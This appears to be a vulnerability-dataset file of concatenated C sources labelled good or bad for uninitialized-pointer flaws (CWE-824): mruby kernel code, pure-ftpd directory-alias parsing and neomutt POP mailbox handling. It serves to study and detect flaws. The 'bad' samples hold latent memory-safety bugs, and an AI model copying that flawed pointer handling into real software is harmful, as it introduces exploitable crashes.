mrb_define_method(mrb, krn, "kind_of?", mrb_obj_is_kind_of_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.26 */
mrb_define_method(mrb, krn, "local_variables", mrb_local_variables, MRB_ARGS_NONE()); /* 15.3.1.3.28 */
#ifdef MRB_DEFAULT_METHOD_MISSING
mrb_define_method(mrb, krn, "method_missing", mrb_obj_missing, MRB_ARGS_ANY()); /* 15.3.1.3.30 */
#endif
mrb_define_method(mrb, krn, "methods", mrb_obj_methods_m, MRB_ARGS_OPT(1)); /* 15.3.1.3.31 */
mrb_define_method(mrb, krn, "nil?", mrb_false, MRB_ARGS_NONE()); /* 15.3.1.3.32 */
mrb_define_method(mrb, krn, "object_id", mrb_obj_id_m, MRB_ARGS_NONE()); /* 15.3.1.3.33 */
mrb_define_method(mrb, krn, "private_methods", mrb_obj_private_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.36 */
mrb_define_method(mrb, krn, "protected_methods", mrb_obj_protected_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.37 */
mrb_define_method(mrb, krn, "public_methods", mrb_obj_public_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.38 */
mrb_define_method(mrb, krn, "raise", mrb_f_raise, MRB_ARGS_ANY()); /* 15.3.1.3.40 */
mrb_define_method(mrb, krn, "remove_instance_variable", mrb_obj_remove_instance_variable,MRB_ARGS_REQ(1)); /* 15.3.1.3.41 */
mrb_define_method(mrb, krn, "respond_to?", obj_respond_to, MRB_ARGS_ANY()); /* 15.3.1.3.43 */
mrb_define_method(mrb, krn, "send", mrb_f_send, MRB_ARGS_ANY()); /* 15.3.1.3.44 */
mrb_define_method(mrb, krn, "singleton_methods", mrb_obj_singleton_methods_m, MRB_ARGS_OPT(1)); /* 15.3.1.3.45 */
mrb_define_method(mrb, krn, "define_singleton_method", mod_define_singleton_method, MRB_ARGS_ANY());
mrb_define_method(mrb, krn, "to_s", mrb_any_to_s, MRB_ARGS_NONE()); /* 15.3.1.3.46 */
mrb_define_method(mrb, krn, "__case_eqq", mrb_obj_ceqq, MRB_ARGS_REQ(1)); /* internal */
mrb_define_method(mrb, krn, "class_defined?", mrb_krn_class_defined, MRB_ARGS_REQ(1));
mrb_include_module(mrb, mrb->object_class, mrb->kernel_module);
mrb_alias_method(mrb, mrb->module_class, mrb_intern_lit(mrb, "dup"), mrb_intern_lit(mrb, "clone"));
}
| ./CrossVul/dataset_final_sorted/CWE-824/c/good_168_0 |
crossvul-cpp_data_bad_4684_0 | /*
0) alias file format.
alternating lines of alias and dir
(this enables embedded whitespace in dir and alias without quoting rules)
optional blank lines
optional lines beginning with '#' as comments
(no you can't put a '#' just anywhere)
1) data structure for alias list nodes.
typedef struct DirAlias_ {
char *alias;
char *dir;
struct DirAlias *next;
} DirAlias;
2) init routine
A) open alias file
B) while not EOF do
read line
parse line
dir must begin with "/"
allocate DirAlias and members
if tail is NULL then head and tail (global DirAlias_t pointers)
are set to member
else tail->next is set to member and then tail is set to member
3) lookup routine
A) given potential alias return dir or NULL
(walk list starting with head looking for match)
4) FTP CWD command mods
A) if chdir() fails try alias (use lookup routine)
5) FTP SITE ALIAS command
A) list aliases
*/
#include <config.h>
#ifdef WITH_DIRALIASES
#include "ftpd.h"
#include "messages.h"
#include "diraliases.h"
#ifdef WITH_DMALLOC
# include <dmalloc.h>
#endif
static DirAlias *head, *tail;
static signed char aliases_up;
/* returns: 0 on success, -1 on failure */
int init_aliases(void)
{
FILE *fp;
char alias[MAXALIASLEN + 1U];
char dir[PATH_MAX + 1U];
if ((fp = fopen(ALIASES_FILE, "r")) == NULL) {
return 0;
}
while (fgets(alias, sizeof alias, fp) != NULL) {
if (*alias == '#' || *alias == '\n' || *alias == 0) {
continue;
}
{
char * const z = alias + strlen(alias) - 1U;
if (*z != '\n') {
goto bad;
}
*z = 0;
}
do {
if (fgets(dir, sizeof dir, fp) == NULL || *dir == 0) {
goto bad;
}
{
char * const z = dir + strlen(dir) - 1U;
if (*z == '\n') {
*z = 0;
}
}
} while (*dir == '#' || *dir == 0);
if (head == NULL) {
if ((head = tail = malloc(sizeof *head)) == NULL ||
(tail->alias = strdup(alias)) == NULL ||
(tail->dir = strdup(dir)) == NULL) {
die_mem();
}
tail->next = NULL;
} else {
DirAlias *curr;
if ((curr = malloc(sizeof *curr)) == NULL ||
(curr->alias = strdup(alias)) == NULL ||
(curr->dir = strdup(dir)) == NULL) {
die_mem();
}
tail->next = curr;
tail = curr;
}
}
fclose(fp);
aliases_up++;
return 0;
bad:
fclose(fp);
logfile(LOG_ERR, MSG_ALIASES_BROKEN_FILE " [" ALIASES_FILE "]");
return -1;
}
char *lookup_alias(const char *alias)
{
const DirAlias *curr = head;
if (aliases_up == 0) {
return NULL;
}
while (curr != NULL) {
if (strcmp(curr->alias, alias) == 0) {
return curr->dir;
}
curr = curr->next;
}
return NULL;
}
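/*
 * Sketch only, following point 4) of the header comment (retry a failed
 * chdir() with the aliased directory). The surrounding CWD handler and
 * variable names are hypothetical and not part of this file:
 *
 *   if (chdir(dir) != 0) {
 *       const char *aliased = lookup_alias(dir);
 *       if (aliased == NULL || chdir(aliased) != 0) {
 *           // report the failure to the client
 *       }
 *   }
 */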
void print_aliases(void)
{
const DirAlias *curr = head;
if (aliases_up == 0) {
addreply_noformat(502, MSG_CONF_ERR);
return;
}
addreply_noformat(214, MSG_ALIASES_LIST);
while (curr != NULL) {
char line[MAXALIASLEN + PATH_MAX + 3U];
snprintf(line, sizeof line, " %s %s", curr->alias, curr->dir);
addreply_noformat(0, line);
curr = curr->next;
}
addreply_noformat(214, " ");
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-824/c/bad_4684_0 |
crossvul-cpp_data_bad_250_0 | /**
* @file
* POP network mailbox
*
* @authors
* Copyright (C) 2000-2002 Vsevolod Volkov <vvv@mutt.org.ua>
* Copyright (C) 2006-2007,2009 Rocco Rutte <pdmef@gmx.net>
*
* @copyright
* This program is free software: you can redistribute it and/or modify it under
* the terms of the GNU General Public License as published by the Free Software
* Foundation, either version 2 of the License, or (at your option) any later
* version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License along with
* this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
* @page pop POP network mailbox
*
* POP network mailbox
*/
#include "config.h"
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "mutt/mutt.h"
#include "conn/conn.h"
#include "mutt.h"
#include "pop.h"
#include "bcache.h"
#include "body.h"
#include "context.h"
#include "envelope.h"
#include "globals.h"
#include "header.h"
#include "mailbox.h"
#include "mutt_account.h"
#include "mutt_curses.h"
#include "mutt_socket.h"
#include "mx.h"
#include "ncrypt/ncrypt.h"
#include "options.h"
#include "progress.h"
#include "protos.h"
#include "url.h"
#ifdef USE_HCACHE
#include "hcache/hcache.h"
#endif
#ifdef USE_HCACHE
#define HC_FNAME "neomutt" /* filename for hcache as POP lacks paths */
#define HC_FEXT "hcache" /* extension for hcache as POP lacks paths */
#endif
/**
* cache_id - Make a message-cache-compatible id
* @param id POP message id
* @retval ptr Sanitised string
*
* The POP message id may contain '/' and other awkward characters.
*
* @note This function returns a pointer to a static buffer.
*/
static const char *cache_id(const char *id)
{
static char clean[SHORT_STRING];
mutt_str_strfcpy(clean, id, sizeof(clean));
mutt_file_sanitize_filename(clean, true);
return clean;
}
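/*
 * For illustration only; the exact result depends on
 * mutt_file_sanitize_filename(), which is assumed here to replace unsafe
 * characters such as '/':
 *
 *   cache_id("UID123/456") would yield something like "UID123_456",
 *   making the id safe to use as a body-cache filename.
 */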
/**
* fetch_message - write line to file
* @param line String to write
* @param file FILE pointer to write to
* @retval 0 Success
* @retval -1 Failure
*/
static int fetch_message(char *line, void *file)
{
FILE *f = (FILE *) file;
fputs(line, f);
if (fputc('\n', f) == EOF)
return -1;
return 0;
}
/**
* pop_read_header - Read header
* @param pop_data POP data
* @param h Email header
* @retval 0 Success
* @retval -1 Connection lost
* @retval -2 Invalid command or execution error
* @retval -3 Error writing to tempfile
*/
static int pop_read_header(struct PopData *pop_data, struct Header *h)
{
int rc, index;
size_t length;
char buf[LONG_STRING];
FILE *f = mutt_file_mkstemp();
if (!f)
{
mutt_perror("mutt_file_mkstemp failed!");
return -3;
}
snprintf(buf, sizeof(buf), "LIST %d\r\n", h->refno);
rc = pop_query(pop_data, buf, sizeof(buf));
if (rc == 0)
{
sscanf(buf, "+OK %d %zu", &index, &length);
snprintf(buf, sizeof(buf), "TOP %d 0\r\n", h->refno);
rc = pop_fetch_data(pop_data, buf, NULL, fetch_message, f);
if (pop_data->cmd_top == 2)
{
if (rc == 0)
{
pop_data->cmd_top = 1;
mutt_debug(1, "set TOP capability\n");
}
if (rc == -2)
{
pop_data->cmd_top = 0;
mutt_debug(1, "unset TOP capability\n");
snprintf(pop_data->err_msg, sizeof(pop_data->err_msg), "%s",
_("Command TOP is not supported by server."));
}
}
}
switch (rc)
{
case 0:
{
rewind(f);
h->env = mutt_rfc822_read_header(f, h, 0, 0);
h->content->length = length - h->content->offset + 1;
rewind(f);
while (!feof(f))
{
h->content->length--;
fgets(buf, sizeof(buf), f);
}
break;
}
case -2:
{
mutt_error("%s", pop_data->err_msg);
break;
}
case -3:
{
mutt_error(_("Can't write header to temporary file!"));
break;
}
}
mutt_file_fclose(&f);
return rc;
}
/**
* fetch_uidl - parse UIDL
* @param line String to parse
* @param data Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int fetch_uidl(char *line, void *data)
{
int i, index;
struct Context *ctx = (struct Context *) data;
struct PopData *pop_data = (struct PopData *) ctx->data;
char *endp = NULL;
errno = 0;
index = strtol(line, &endp, 10);
if (errno)
return -1;
while (*endp == ' ')
endp++;
memmove(line, endp, strlen(endp) + 1);
for (i = 0; i < ctx->msgcount; i++)
if (mutt_str_strcmp(line, ctx->hdrs[i]->data) == 0)
break;
if (i == ctx->msgcount)
{
mutt_debug(1, "new header %d %s\n", index, line);
if (i >= ctx->hdrmax)
mx_alloc_memory(ctx);
ctx->msgcount++;
ctx->hdrs[i] = mutt_header_new();
ctx->hdrs[i]->data = mutt_str_strdup(line);
}
else if (ctx->hdrs[i]->index != index - 1)
pop_data->clear_cache = true;
ctx->hdrs[i]->refno = index;
ctx->hdrs[i]->index = index - 1;
return 0;
}
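/*
 * For reference, each line handed to fetch_uidl() above is one entry of a
 * POP3 UIDL multi-line response (RFC 1939), e.g.:
 *
 *   1 whqtswO00WBw418f9t5JxYwZ
 *
 * strtol() reads the leading message number and, after skipping spaces,
 * the remainder of the line is the unique id stored in ctx->hdrs[i]->data.
 * (The sample id is taken from the RFC's example, not from this codebase.)
 */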
/**
* msg_cache_check - Check the Body Cache for an ID
* @param id Cache ID
* @param bcache Body cache
* @param data Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int msg_cache_check(const char *id, struct BodyCache *bcache, void *data)
{
struct Context *ctx = (struct Context *) data;
if (!ctx)
return -1;
struct PopData *pop_data = (struct PopData *) ctx->data;
if (!pop_data)
return -1;
#ifdef USE_HCACHE
/* keep hcache file if hcache == bcache */
if (strcmp(HC_FNAME "." HC_FEXT, id) == 0)
return 0;
#endif
for (int i = 0; i < ctx->msgcount; i++)
{
/* if the id we get is known for a header: done (i.e. keep in cache) */
if (ctx->hdrs[i]->data && (mutt_str_strcmp(ctx->hdrs[i]->data, id) == 0))
return 0;
}
/* message not found in context -> remove it from cache
* return the result of bcache, so we stop upon its first error
*/
return mutt_bcache_del(bcache, cache_id(id));
}
#ifdef USE_HCACHE
/**
* pop_hcache_namer - Create a header cache filename for a POP mailbox
* @param path Path of mailbox
* @param dest Buffer for filename
* @param destlen Length of buffer
* @retval num Characters written to buffer
*/
static int pop_hcache_namer(const char *path, char *dest, size_t destlen)
{
return snprintf(dest, destlen, "%s." HC_FEXT, path);
}
/**
* pop_hcache_open - Open the header cache
* @param pop_data POP server data
* @param path Path to the mailbox
* @retval ptr Header cache
*/
static header_cache_t *pop_hcache_open(struct PopData *pop_data, const char *path)
{
struct Url url;
char p[LONG_STRING];
if (!pop_data || !pop_data->conn)
return mutt_hcache_open(HeaderCache, path, NULL);
mutt_account_tourl(&pop_data->conn->account, &url);
url.path = HC_FNAME;
url_tostring(&url, p, sizeof(p), U_PATH);
return mutt_hcache_open(HeaderCache, p, pop_hcache_namer);
}
#endif
/**
* pop_fetch_headers - Read headers
* @param ctx Context
* @retval 0 Success
* @retval -1 Connection lost
* @retval -2 Invalid command or execution error
* @retval -3 Error writing to tempfile
*/
static int pop_fetch_headers(struct Context *ctx)
{
struct PopData *pop_data = (struct PopData *) ctx->data;
struct Progress progress;
#ifdef USE_HCACHE
header_cache_t *hc = pop_hcache_open(pop_data, ctx->path);
#endif
time(&pop_data->check_time);
pop_data->clear_cache = false;
for (int i = 0; i < ctx->msgcount; i++)
ctx->hdrs[i]->refno = -1;
const int old_count = ctx->msgcount;
int ret = pop_fetch_data(pop_data, "UIDL\r\n", NULL, fetch_uidl, ctx);
const int new_count = ctx->msgcount;
ctx->msgcount = old_count;
if (pop_data->cmd_uidl == 2)
{
if (ret == 0)
{
pop_data->cmd_uidl = 1;
mutt_debug(1, "set UIDL capability\n");
}
if (ret == -2 && pop_data->cmd_uidl == 2)
{
pop_data->cmd_uidl = 0;
mutt_debug(1, "unset UIDL capability\n");
snprintf(pop_data->err_msg, sizeof(pop_data->err_msg), "%s",
_("Command UIDL is not supported by server."));
}
}
if (!ctx->quiet)
{
mutt_progress_init(&progress, _("Fetching message headers..."),
MUTT_PROGRESS_MSG, ReadInc, new_count - old_count);
}
if (ret == 0)
{
int i, deleted;
for (i = 0, deleted = 0; i < old_count; i++)
{
if (ctx->hdrs[i]->refno == -1)
{
ctx->hdrs[i]->deleted = true;
deleted++;
}
}
if (deleted > 0)
{
mutt_error(
ngettext("%d message has been lost. Try reopening the mailbox.",
"%d messages have been lost. Try reopening the mailbox.", deleted),
deleted);
}
bool hcached = false;
for (i = old_count; i < new_count; i++)
{
if (!ctx->quiet)
mutt_progress_update(&progress, i + 1 - old_count, -1);
#ifdef USE_HCACHE
void *data = mutt_hcache_fetch(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data));
if (data)
{
char *uidl = mutt_str_strdup(ctx->hdrs[i]->data);
int refno = ctx->hdrs[i]->refno;
int index = ctx->hdrs[i]->index;
/*
* - POP dynamically numbers headers and relies on h->refno
* to map messages; so restore header and overwrite restored
* refno with current refno, same for index
* - h->data needs to be a separate pointer as it's driver-specific
* data freed separately elsewhere
* (the old h->data should point inside a malloc'd block from
* hcache so there shouldn't be a memleak here)
*/
struct Header *h = mutt_hcache_restore((unsigned char *) data);
mutt_hcache_free(hc, &data);
mutt_header_free(&ctx->hdrs[i]);
ctx->hdrs[i] = h;
ctx->hdrs[i]->refno = refno;
ctx->hdrs[i]->index = index;
ctx->hdrs[i]->data = uidl;
ret = 0;
hcached = true;
}
else
#endif
if ((ret = pop_read_header(pop_data, ctx->hdrs[i])) < 0)
break;
#ifdef USE_HCACHE
else
{
mutt_hcache_store(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data),
ctx->hdrs[i], 0);
}
#endif
/*
* faked support for flags works like this:
* - if 'hcached' is true, we have the message in our hcache:
* - if we also have a body: read
* - if we don't have a body: old
* (if $mark_old is set which is maybe wrong as
* $mark_old should be considered for syncing the
* folder and not when opening it XXX)
* - if 'hcached' is false, we don't have the message in our hcache:
* - if we also have a body: read
* - if we don't have a body: new
*/
const bool bcached =
(mutt_bcache_exists(pop_data->bcache, cache_id(ctx->hdrs[i]->data)) == 0);
ctx->hdrs[i]->old = false;
ctx->hdrs[i]->read = false;
if (hcached)
{
if (bcached)
ctx->hdrs[i]->read = true;
else if (MarkOld)
ctx->hdrs[i]->old = true;
}
else
{
if (bcached)
ctx->hdrs[i]->read = true;
}
ctx->msgcount++;
}
if (i > old_count)
mx_update_context(ctx, i - old_count);
}
#ifdef USE_HCACHE
mutt_hcache_close(hc);
#endif
if (ret < 0)
{
for (int i = ctx->msgcount; i < new_count; i++)
mutt_header_free(&ctx->hdrs[i]);
return ret;
}
/* after putting the result into our structures,
* clean up cache, i.e. wipe messages deleted outside
* the availability of our cache
*/
if (MessageCacheClean)
mutt_bcache_list(pop_data->bcache, msg_cache_check, (void *) ctx);
mutt_clear_error();
return (new_count - old_count);
}
/**
* pop_open_mailbox - open POP mailbox, fetch only headers
* @param ctx Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_open_mailbox(struct Context *ctx)
{
char buf[PATH_MAX];
struct Connection *conn = NULL;
struct Account acct;
struct PopData *pop_data = NULL;
struct Url url;
if (pop_parse_path(ctx->path, &acct))
{
mutt_error(_("%s is an invalid POP path"), ctx->path);
return -1;
}
mutt_account_tourl(&acct, &url);
url.path = NULL;
url_tostring(&url, buf, sizeof(buf), 0);
conn = mutt_conn_find(NULL, &acct);
if (!conn)
return -1;
FREE(&ctx->path);
FREE(&ctx->realpath);
ctx->path = mutt_str_strdup(buf);
ctx->realpath = mutt_str_strdup(ctx->path);
pop_data = mutt_mem_calloc(1, sizeof(struct PopData));
pop_data->conn = conn;
ctx->data = pop_data;
if (pop_open_connection(pop_data) < 0)
return -1;
conn->data = pop_data;
pop_data->bcache = mutt_bcache_open(&acct, NULL);
/* init (hard-coded) ACL rights */
memset(ctx->rights, 0, sizeof(ctx->rights));
mutt_bit_set(ctx->rights, MUTT_ACL_SEEN);
mutt_bit_set(ctx->rights, MUTT_ACL_DELETE);
#ifdef USE_HCACHE
/* flags are managed using header cache, so it only makes sense to
* enable them in that case */
mutt_bit_set(ctx->rights, MUTT_ACL_WRITE);
#endif
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
ctx->size = pop_data->size;
mutt_message(_("Fetching list of messages..."));
const int ret = pop_fetch_headers(ctx);
if (ret >= 0)
return 0;
if (ret < -1)
{
mutt_sleep(2);
return -1;
}
}
}
/**
* pop_clear_cache - delete all cached messages
* @param pop_data POP server data
*/
static void pop_clear_cache(struct PopData *pop_data)
{
if (!pop_data->clear_cache)
return;
mutt_debug(1, "delete cached messages\n");
for (int i = 0; i < POP_CACHE_LEN; i++)
{
if (pop_data->cache[i].path)
{
unlink(pop_data->cache[i].path);
FREE(&pop_data->cache[i].path);
}
}
}
/**
* pop_close_mailbox - close POP mailbox
* @param ctx Mailbox Context
* @retval 0 Always
*/
static int pop_close_mailbox(struct Context *ctx)
{
struct PopData *pop_data = (struct PopData *) ctx->data;
if (!pop_data)
return 0;
pop_logout(ctx);
if (pop_data->status != POP_NONE)
mutt_socket_close(pop_data->conn);
pop_data->status = POP_NONE;
pop_data->clear_cache = true;
pop_clear_cache(pop_data);
if (!pop_data->conn->data)
mutt_socket_free(pop_data->conn);
mutt_bcache_close(&pop_data->bcache);
return 0;
}
/**
* pop_fetch_message - fetch message from POP server
* @param ctx Mailbox Context
* @param msg Message
* @param msgno Message number
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_fetch_message(struct Context *ctx, struct Message *msg, int msgno)
{
void *uidl = NULL;
char buf[LONG_STRING];
char path[PATH_MAX];
struct Progress progressbar;
struct PopData *pop_data = (struct PopData *) ctx->data;
struct PopCache *cache = NULL;
struct Header *h = ctx->hdrs[msgno];
unsigned short bcache = 1;
/* see if we already have the message in body cache */
msg->fp = mutt_bcache_get(pop_data->bcache, cache_id(h->data));
if (msg->fp)
return 0;
/*
* see if we already have the message in our cache in
* case $message_cachedir is unset
*/
cache = &pop_data->cache[h->index % POP_CACHE_LEN];
if (cache->path)
{
if (cache->index == h->index)
{
/* yes, so just return a pointer to the message */
msg->fp = fopen(cache->path, "r");
if (msg->fp)
return 0;
mutt_perror(cache->path);
return -1;
}
else
{
/* clear the previous entry */
unlink(cache->path);
FREE(&cache->path);
}
}
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
/* verify that message index is correct */
if (h->refno < 0)
{
mutt_error(
_("The message index is incorrect. Try reopening the mailbox."));
return -1;
}
mutt_progress_init(&progressbar, _("Fetching message..."), MUTT_PROGRESS_SIZE,
NetInc, h->content->length + h->content->offset - 1);
/* see if we can put in body cache; use our cache as fallback */
msg->fp = mutt_bcache_put(pop_data->bcache, cache_id(h->data));
if (!msg->fp)
{
/* no */
bcache = 0;
mutt_mktemp(path, sizeof(path));
msg->fp = mutt_file_fopen(path, "w+");
if (!msg->fp)
{
mutt_perror(path);
return -1;
}
}
snprintf(buf, sizeof(buf), "RETR %d\r\n", h->refno);
const int ret = pop_fetch_data(pop_data, buf, &progressbar, fetch_message, msg->fp);
if (ret == 0)
break;
mutt_file_fclose(&msg->fp);
/* if RETR failed (e.g. connection closed), be sure to remove either
* the file in bcache or from POP's own cache since the next iteration
* of the loop will re-attempt to put() the message */
if (!bcache)
unlink(path);
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
return -1;
}
if (ret == -3)
{
mutt_error(_("Can't write message to temporary file!"));
return -1;
}
}
/* Update the header information. Previously, we only downloaded a
* portion of the headers, those required for the main display.
*/
if (bcache)
mutt_bcache_commit(pop_data->bcache, cache_id(h->data));
else
{
cache->index = h->index;
cache->path = mutt_str_strdup(path);
}
rewind(msg->fp);
uidl = h->data;
/* we replace the envelope, so the key in subj_hash has to be updated as well */
if (ctx->subj_hash && h->env->real_subj)
mutt_hash_delete(ctx->subj_hash, h->env->real_subj, h);
mutt_label_hash_remove(ctx, h);
mutt_env_free(&h->env);
h->env = mutt_rfc822_read_header(msg->fp, h, 0, 0);
if (ctx->subj_hash && h->env->real_subj)
mutt_hash_insert(ctx->subj_hash, h->env->real_subj, h);
mutt_label_hash_add(ctx, h);
h->data = uidl;
h->lines = 0;
fgets(buf, sizeof(buf), msg->fp);
while (!feof(msg->fp))
{
ctx->hdrs[msgno]->lines++;
fgets(buf, sizeof(buf), msg->fp);
}
h->content->length = ftello(msg->fp) - h->content->offset;
/* This needs to be done in case this is a multipart message */
if (!WithCrypto)
h->security = crypt_query(h->content);
mutt_clear_error();
rewind(msg->fp);
return 0;
}
/**
* pop_close_message - Close POP Message
* @param ctx Mailbox Context
* @param msg Message
* @retval 0 Success
* @retval EOF Error, see errno
*/
static int pop_close_message(struct Context *ctx, struct Message *msg)
{
return mutt_file_fclose(&msg->fp);
}
/**
* pop_sync_mailbox - update POP mailbox, delete messages from server
* @param ctx Mailbox Context
* @param index_hint Current Message
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_sync_mailbox(struct Context *ctx, int *index_hint)
{
int i, j, ret = 0;
char buf[LONG_STRING];
struct PopData *pop_data = (struct PopData *) ctx->data;
struct Progress progress;
#ifdef USE_HCACHE
header_cache_t *hc = NULL;
#endif
pop_data->check_time = 0;
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
mutt_progress_init(&progress, _("Marking messages deleted..."),
MUTT_PROGRESS_MSG, WriteInc, ctx->deleted);
#ifdef USE_HCACHE
hc = pop_hcache_open(pop_data, ctx->path);
#endif
for (i = 0, j = 0, ret = 0; ret == 0 && i < ctx->msgcount; i++)
{
if (ctx->hdrs[i]->deleted && ctx->hdrs[i]->refno != -1)
{
j++;
if (!ctx->quiet)
mutt_progress_update(&progress, j, -1);
snprintf(buf, sizeof(buf), "DELE %d\r\n", ctx->hdrs[i]->refno);
ret = pop_query(pop_data, buf, sizeof(buf));
if (ret == 0)
{
mutt_bcache_del(pop_data->bcache, cache_id(ctx->hdrs[i]->data));
#ifdef USE_HCACHE
mutt_hcache_delete(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data));
#endif
}
}
#ifdef USE_HCACHE
if (ctx->hdrs[i]->changed)
{
mutt_hcache_store(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data),
ctx->hdrs[i], 0);
}
#endif
}
#ifdef USE_HCACHE
mutt_hcache_close(hc);
#endif
if (ret == 0)
{
mutt_str_strfcpy(buf, "QUIT\r\n", sizeof(buf));
ret = pop_query(pop_data, buf, sizeof(buf));
}
if (ret == 0)
{
pop_data->clear_cache = true;
pop_clear_cache(pop_data);
pop_data->status = POP_DISCONNECTED;
return 0;
}
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
return -1;
}
}
}
/**
* pop_check_mailbox - Check for new messages and fetch headers
* @param ctx Mailbox Context
* @param index_hint Current Message
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_check_mailbox(struct Context *ctx, int *index_hint)
{
int ret;
struct PopData *pop_data = (struct PopData *) ctx->data;
if ((pop_data->check_time + PopCheckinterval) > time(NULL))
return 0;
pop_logout(ctx);
mutt_socket_close(pop_data->conn);
if (pop_open_connection(pop_data) < 0)
return -1;
ctx->size = pop_data->size;
mutt_message(_("Checking for new messages..."));
ret = pop_fetch_headers(ctx);
pop_clear_cache(pop_data);
if (ret < 0)
return -1;
if (ret > 0)
return MUTT_NEW_MAIL;
return 0;
}
/**
* pop_fetch_mail - Fetch messages and save them in $spoolfile
*/
void pop_fetch_mail(void)
{
char buffer[LONG_STRING];
char msgbuf[SHORT_STRING];
char *url = NULL, *p = NULL;
int delanswer, last = 0, msgs, bytes, rset = 0, ret;
struct Connection *conn = NULL;
struct Context ctx;
struct Message *msg = NULL;
struct Account acct;
struct PopData *pop_data = NULL;
if (!PopHost)
{
mutt_error(_("POP host is not defined."));
return;
}
url = p = mutt_mem_calloc(strlen(PopHost) + 7, sizeof(char));
if (url_check_scheme(PopHost) == U_UNKNOWN)
{
strcpy(url, "pop://");
p = strchr(url, '\0');
}
strcpy(p, PopHost);
ret = pop_parse_path(url, &acct);
FREE(&url);
if (ret)
{
mutt_error(_("%s is an invalid POP path"), PopHost);
return;
}
conn = mutt_conn_find(NULL, &acct);
if (!conn)
return;
pop_data = mutt_mem_calloc(1, sizeof(struct PopData));
pop_data->conn = conn;
if (pop_open_connection(pop_data) < 0)
{
mutt_socket_free(pop_data->conn);
FREE(&pop_data);
return;
}
conn->data = pop_data;
mutt_message(_("Checking for new messages..."));
/* find out how many messages are in the mailbox. */
mutt_str_strfcpy(buffer, "STAT\r\n", sizeof(buffer));
ret = pop_query(pop_data, buffer, sizeof(buffer));
if (ret == -1)
goto fail;
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
goto finish;
}
sscanf(buffer, "+OK %d %d", &msgs, &bytes);
/* only get unread messages */
if (msgs > 0 && PopLast)
{
mutt_str_strfcpy(buffer, "LAST\r\n", sizeof(buffer));
ret = pop_query(pop_data, buffer, sizeof(buffer));
if (ret == -1)
goto fail;
if (ret == 0)
sscanf(buffer, "+OK %d", &last);
}
if (msgs <= last)
{
mutt_message(_("No new mail in POP mailbox."));
goto finish;
}
if (mx_mbox_open(NONULL(Spoolfile), MUTT_APPEND, &ctx) == NULL)
goto finish;
delanswer = query_quadoption(PopDelete, _("Delete messages from server?"));
snprintf(msgbuf, sizeof(msgbuf),
ngettext("Reading new messages (%d byte)...",
"Reading new messages (%d bytes)...", bytes),
bytes);
mutt_message("%s", msgbuf);
for (int i = last + 1; i <= msgs; i++)
{
msg = mx_msg_open_new(&ctx, NULL, MUTT_ADD_FROM);
if (!msg)
ret = -3;
else
{
snprintf(buffer, sizeof(buffer), "RETR %d\r\n", i);
ret = pop_fetch_data(pop_data, buffer, NULL, fetch_message, msg->fp);
if (ret == -3)
rset = 1;
if (ret == 0 && mx_msg_commit(&ctx, msg) != 0)
{
rset = 1;
ret = -3;
}
mx_msg_close(&ctx, &msg);
}
if (ret == 0 && delanswer == MUTT_YES)
{
/* delete the message on the server */
snprintf(buffer, sizeof(buffer), "DELE %d\r\n", i);
ret = pop_query(pop_data, buffer, sizeof(buffer));
}
if (ret == -1)
{
mx_mbox_close(&ctx, NULL);
goto fail;
}
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
break;
}
if (ret == -3)
{
mutt_error(_("Error while writing mailbox!"));
break;
}
/* L10N: The plural is picked by the second numerical argument, i.e.
* the %d right before 'messages', i.e. the total number of messages. */
mutt_message(ngettext("%s [%d of %d message read]",
"%s [%d of %d messages read]", msgs - last),
msgbuf, i - last, msgs - last);
}
mx_mbox_close(&ctx, NULL);
if (rset)
{
/* make sure no messages get deleted */
mutt_str_strfcpy(buffer, "RSET\r\n", sizeof(buffer));
if (pop_query(pop_data, buffer, sizeof(buffer)) == -1)
goto fail;
}
finish:
/* exit gracefully */
mutt_str_strfcpy(buffer, "QUIT\r\n", sizeof(buffer));
if (pop_query(pop_data, buffer, sizeof(buffer)) == -1)
goto fail;
mutt_socket_close(conn);
FREE(&pop_data);
return;
fail:
mutt_error(_("Server closed connection!"));
mutt_socket_close(conn);
FREE(&pop_data);
}
// clang-format off
/**
* mx_pop_ops - Mailbox callback functions for POP mailboxes
*/
struct MxOps mx_pop_ops = {
.mbox_open = pop_open_mailbox,
.mbox_open_append = NULL,
.mbox_check = pop_check_mailbox,
.mbox_sync = pop_sync_mailbox,
.mbox_close = pop_close_mailbox,
.msg_open = pop_fetch_message,
.msg_open_new = NULL,
.msg_commit = NULL,
.msg_close = pop_close_message,
.tags_edit = NULL,
.tags_commit = NULL,
};
// clang-format on
| ./CrossVul/dataset_final_sorted/CWE-824/c/bad_250_0 |
crossvul-cpp_data_bad_168_0 | /*
** kernel.c - Kernel module
**
** See Copyright Notice in mruby.h
*/
#include <mruby.h>
#include <mruby/array.h>
#include <mruby/hash.h>
#include <mruby/class.h>
#include <mruby/proc.h>
#include <mruby/string.h>
#include <mruby/variable.h>
#include <mruby/error.h>
#include <mruby/istruct.h>
typedef enum {
NOEX_PUBLIC = 0x00,
